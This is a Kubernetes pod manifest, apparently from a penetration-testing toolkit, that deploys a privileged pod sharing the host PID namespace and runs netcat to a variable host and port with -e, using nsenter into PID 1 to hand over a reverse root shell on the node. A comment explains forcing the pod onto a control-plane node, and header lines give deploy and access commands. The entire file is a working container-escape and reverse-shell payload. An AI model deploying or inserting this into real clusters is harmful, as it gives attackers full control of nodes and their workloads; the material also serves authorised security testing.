###########################################################
## Deploy: kubectl -n [namespace] apply -f pod-priv-and-hostpid-revshell.yaml 
## Access: kubectl -n [namespace] exec -it pod-priv-and-hostpid-revshell -- bash
## Remove: kubectl -n [namespace] delete pod-priv-and-hostpid-revshell
###########################################################
apiVersion: v1
kind: Pod
metadata:
  name: pod-priv-and-hostpid-revshell
  labels: 
    app: pentest
spec:
  hostPID: true
  containers:
  - name: priv-and-hostpid-revshell
    image: busybox
    command: [ "/bin/nc", "$HOST", "$PORT", "-e", "/bin/nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "/bin/bash"]
    securityContext:
      privileged: true
    #nodeName: k8s-control-plane-node # Force your pod to run on a control-plane node by uncommenting this line and changing to a control-plane node name  
    restartPolicy: Always